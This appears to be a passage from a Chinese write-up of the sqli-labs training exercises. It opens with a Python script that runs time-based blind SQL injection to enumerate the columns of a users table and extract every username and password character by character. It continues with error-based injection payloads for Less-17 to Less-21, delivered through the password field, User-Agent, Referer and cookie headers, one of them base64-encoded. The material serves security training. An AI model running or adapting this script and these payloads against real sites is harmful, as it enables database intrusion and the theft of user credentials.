print("")
for i in range(50):
payload = '1") or (select count(column_name) from information_schema.columns where table_schema=database() and table_name="users")={} and sleep(0.1)#'.format(i)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的users表的所有字段名:
def get_column_name(count):
print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
print("================请耐心等待!!!=======================")
print("")
print("")
column_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
payload = '1") or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit {},1),{},1))={} and sleep(0.1)#'.format(i,j,k)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time > 1:
column_name += chr(k)
print(column_name)
break
print("第{}个字段名为:".format(i + 1) + column_name)
column_name = ''
print("=========以上为当前数据库下的users表的所有字段名")
print("")
print("")
return 0
# 爆破当前users表有多少条数据记录:
def get_users_count() -> int:
print("======正在爆破当前users表有多少条数据记录!!!=======")
print("================请耐心等待!!!=======================")
for i in range(100):
payload = '1") or (select count(*) from users )={} and sleep(0.1)#'.format(i)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前users表有{}条数据记录".format(count))
print("")
print("")
return count
#爆破当前数据库中users表中的username字段和password的字段内容:
def get_username(count):
print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
print("=============================请耐心等待!!!===============================")
values = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
payload = '1") or ascii(substr((select concat(id,"---",username,"---",password) from users limit {},1),{},1))={} and sleep(0.1)#'.format(i,j,k)
param = {"uname": payload, "passwd": ""}
start_time = time.time()
requests.post(url, data=param)
if time.time() - start_time >1:
values += chr(k)
print(values)
break
print("===第{}条记录的id值为:".format(i+1)+values)
values = ''
print("=====以上为users表中所有数据========")
print("")
print("")
return 0
# 调用以上函数:
if __name__ == '__main__':
get_database_name(get_database_name_length()) #获取当前数据库名长度、获取当前数据库名长度
get_table_name_length(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的每张表名的长度
get_table_name(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的所有表名
get_column_name(get_column_name_count()) #爆破当前数据库下的users表的所有字段个数、爆破当前数据库下的users表的所有字段名
get_username(get_users_count()) #爆破当前users表有多少条数据记录、爆破当前数据库中users表中的username字段和password的字段内容
Less-17:
判断注入点:
通过源码分析:
check_input()中,对 username 进行各种转义的处理,所以此处不能使用username 进行注入
可以对password进行注入
使用updatexml报错注入:
' or (select updatexml(1,concat(0x7e,(select database())),1)) #
Less-18:
判断注入点:
本关我们这里从源代码直接了解到
对 uname 和 passwd 进行了 check_input() 函数的处理,所以我们在输入 uname 和 passwd 上进行注入是不行的,但是在代码中,我们看到了:insert()
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)VALUES ('$uagent','$IP', $uname)";
输入正确的用户密码网页回显User-Agent
因此我们使用报错注入
使用报错注入:
使用Burp抓包修改
修改为:
'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1
Less-19:
判断注入点:
输入正确的用户名密码:
admin
admin
回显网页路径
Your Referer is: http://192.168.0.128:9020/Less-19/
因此可以通过修改User-Agent得到回显
使用报错注入:
使用Burp抓包修改User-Agent:
修改此处的信息:
使用extractvalue函数报错注入:
'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1
Less-20:
判断注入点:
输入正确的用户密码
admin
admin
网页页面回显:
使用报错注入:
使用Burp抓包修改cookie:
'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1
Less-21:
判断注入点:
注入点为修改cookie:
YWRtaW4nYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgQEB2ZXJzaW9uKSwweDdlKSkgYW5kICcxJz0nMQ==
修改cookie使用报错注入:
输入正确用户密码:
admin
admin
发现cookie经过了base64加密
因此我们使用的payload也要进行加密
admin'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1
base64加密后为:
YWRtaW4nYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgQEB2ZXJzaW9uKSwweDdlKSkgYW5kICcxJz0nMQ==
使用Burp修改抓包内容:
报错爆出相关信息
Tmx沐雪
